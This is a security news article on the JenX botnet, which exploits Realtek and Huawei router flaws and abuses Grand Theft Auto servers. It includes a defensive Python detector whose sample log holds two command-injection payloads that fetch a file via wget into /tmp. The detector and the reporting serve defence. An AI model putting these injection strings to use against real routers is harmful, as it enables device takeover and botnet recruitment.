
JenX Botnet Recruits Devices Via Grand Theft Auto Servers


Computer security experts have reported the discovery of a new malware threat called the JenX botnet, which uses highly unusual distribution tactics. Instead of relying on the usual email messages, it abuses servers for one of the most popular video games, Grand Theft Auto, as well as vulnerable IoT devices.

Related story: The Droidclub botnet infiltrates machines via Google Chrome extensions

JenX Botnet Discovery and Infiltration Tactics

A new worldwide botnet infection has been reported by the security community. The new threat is called the JenX botnet and features a highly unusual infiltration mechanism. According to the code analysis, it takes advantage of two vulnerabilities that affect certain popular router models made by Huawei and Realtek. Both are among the biggest network equipment manufacturers, and such models are usually bought in bulk by Internet Service Providers (ISPs) and handed out to customers. This means that potentially thousands or even millions of devices can fall victim to automated exploitation. The two vulnerabilities are tracked in the following security advisories:

  • CVE-2014-8361: the miniigd SOAP service in the Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.
  • CVE-2017-17215: a remote code execution vulnerability in Huawei HG532 routers.

It is interesting to note that both exploits are taken from the Satori botnet. The code snippets were identified in public posts made by the hacker known under the alias Janit0r, who is the author of BrickerBot. According to the research, the botnet is designed specifically to target gaming providers, clubs and gamers.
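Both advisories describe the same class of bug: a SOAP field that should hold an IP address or a URL is passed to a shell without sanitisation. A practitioner watching for JenX-style scanning of ISP-issued routers can therefore flag requests whose NewInternalClient (Realtek miniigd) or NewStatusURL/NewDownloadURL (Huawei HG532 upgrade action) fields contain shell metacharacters. The following is an added example written for this article, not code from the botnet or from the researchers who analysed it; the log entries are constructed, the SOAP field names are taken from the advisories, and the metacharacter list is an assumption about what a legitimate value would never contain.

```python
"""Flag HTTP requests that look like attempts at the two router bugs JenX borrows.

Added example for this article. The log entries below are constructed; the
detection keys on the SOAP fields named in CVE-2014-8361 (NewInternalClient)
and CVE-2017-17215 (NewStatusURL / NewDownloadURL).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Field the Realtek miniigd UPnP handler passes to a shell (CVE-2014-8361).
REALTEK_FIELD = re.compile(r"<NewInternalClient>(.*?)</NewInternalClient>", re.S)
# Fields the Huawei HG532 firmware-upgrade SOAP action passes to a shell (CVE-2017-17215).
HUAWEI_FIELDS = re.compile(r"<(NewStatusURL|NewDownloadURL)>(.*?)</\1>", re.S)
# Shell metacharacters that never belong in an IP address or a download URL
# (assumption: a legitimate client sends neither backticks, ';', '|', '&' nor '$(').
SHELL_META = re.compile(r"[`;|&]|\$\(|\$\{")


@dataclass
class Alert:
    src: str       # client address that sent the request
    cve: str       # which advisory the request pattern matches
    field: str     # SOAP field carrying the suspicious value
    payload: str   # the value itself, for the analyst


def classify(path: str, body: str) -> Optional[Tuple[str, str, str]]:
    """Return (cve, field, value) if the SOAP body carries shell syntax, else None."""
    m = REALTEK_FIELD.search(body)
    if m and SHELL_META.search(m.group(1)):
        return ("CVE-2014-8361", "NewInternalClient", m.group(1))
    m = HUAWEI_FIELDS.search(body)
    if m and SHELL_META.search(m.group(2)):
        return ("CVE-2017-17215", m.group(1), m.group(2))
    return None


def scan(entries: List[Tuple[str, str, str]]) -> List[Alert]:
    """Run classify() over (src, path, body) tuples and collect the hits."""
    alerts = []
    for src, path, body in entries:
        hit = classify(path, body)
        if hit:
            alerts.append(Alert(src, *hit))
    return alerts


# Constructed sample traffic: two benign UPnP/upgrade calls, two injection attempts,
# one unrelated request. Addresses are from documentation ranges.
SAMPLE_LOG = [
    ("203.0.113.5", "/wanipcn.xml",
     "<NewInternalClient>192.168.1.20</NewInternalClient>"),
    ("198.51.100.7", "/wanipcn.xml",
     "<NewInternalClient>`cd /tmp;wget http://198.51.100.7/r`</NewInternalClient>"),
    ("203.0.113.9", "/ctrlt/DeviceUpgrade_1",
     "<NewStatusURL>http://203.0.113.1/status</NewStatusURL>"),
    ("198.51.100.8", "/ctrlt/DeviceUpgrade_1",
     "<NewStatusURL>$(/bin/busybox wget http://198.51.100.8/r -O /tmp/r)</NewStatusURL>"),
    ("203.0.113.11", "/index.html", ""),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.src} {a.cve} {a.field}={a.payload!r}")
```

Run against a real access log the same way: feed (client, path, body) triples from the router's UPnP port (default 52869 for miniigd) and the HG532 upgrade port (37215) into scan(); anything it returns is worth blocking at the ISP edge, since neither service has a reason to be reachable from the Internet at all.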

The malware infiltrates the servers that power the games and, as a result, can reach the client machines as well. The link with Grand Theft Auto comes from the fact that the compromised servers hosting the JenX infrastructure also host the game. Such servers are attractive targets because gaming servers are known for their performance and network connectivity.

This is an evolution of earlier botnets such as Mirai. Their intrusion strategy was to probe devices for default credentials. Once the malware had compromised a target device it could change the account credentials and lock the owners out. Second-generation botnets like Satori depend on firmware vulnerabilities instead, which makes them much more effective against potential targets: most IoT devices never receive critical security updates, either because the vendor has dropped software support or because the owner never installs them. Such exploits can be triggered from automated platforms, which makes it easy even for beginners to use them in their attack campaigns.

The JenX Botnet and the Gaming Servers Connection

One of the proposed reasons why the malware targets gaming servers is that they are frequently rented for whole groups or used in tournaments. Once the malware has infected the server itself, it can be used to spread further malware to the connected clients through the video games themselves, which usually integrate chat features that can be abused.

Using social engineering tactics, the criminals can opt to deliver additional malware through links posted in the chat. These can be disguised as service messages such as password reset links, notifications and so on.

In other cases the victims can be redirected to malware sites that include phishing elements. Instead of delivering executable files, the criminals attempt to trick the users into entering their account credentials on impostor sites. The criminals usually copy the graphics and text of web services and social networks, which are among the most widely visited sites. In recent years these scams have become so advanced that it is sometimes hard to tell the fake from the legitimate service. The criminals not only copy almost the same visual identity, but also obtain TLS certificates for look-alike domain names, so the impostor site loads over a secure connection and shows a padlock just like the real one.

Related story: Smominru botnet infects machines with a Monero cryptocurrency miner

JenX Botnet Infection Capabilities

The researchers note that the botnet is particularly dangerous because it integrates an advanced stealth protection module that aims to hide the threat from security software and analysis. Such techniques are also bundled in advanced ransomware samples, where the infection engine looks for sandbox or debugging environments, virtual machines and antivirus products, which it then either disables or removes. The malware can also be instructed to delete itself if it is unable to bypass the security protection. Such steps can be integrated into the JenX botnet via script commands. The hackers were found to distribute copies of JenX compiled for MIPS, ARM and x86, the most popular platforms among the targeted devices.

The operators seek to silently infiltrate both commercial and private servers, and the wide range of supported platforms appears to be an important factor in that. The criminal group behind the attacks utilizes a centralized server that acts as the primary malware platform: the operators load the exploits onto it, along with other custom scripts, to execute the follow-up stages of the infection.

The infiltrated sites offer access to modded Grand Theft Auto San Andreas servers for $16, while TeamSpeak servers are sold for $9. Customers who pay $20 more can use the compromised servers for DDoS attacks against targets of their choice. The reports indicate that the peak attack bandwidth can reach 290 or 300 Gbps. At the moment the impact of the JenX botnet is limited to minor disruption among local gamers; it can be used to sabotage Grand Theft Auto tournaments and group play.

The experts note that if the centralized servers can be taken down, the whole platform fails. It is presumed that future versions of the threat will be updated to use a decentralized approach; recent infections from other families have been found to feature a P2P design, which is harder to mitigate.

We recommend that all users scan their systems for active infections and protect themselves from incoming threats by using a quality anti-malware solution; owners of the affected Huawei and Realtek-based routers should also apply the vendor firmware updates and make sure the UPnP and remote management services are not reachable from the Internet.



Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and intrusion mechanisms.
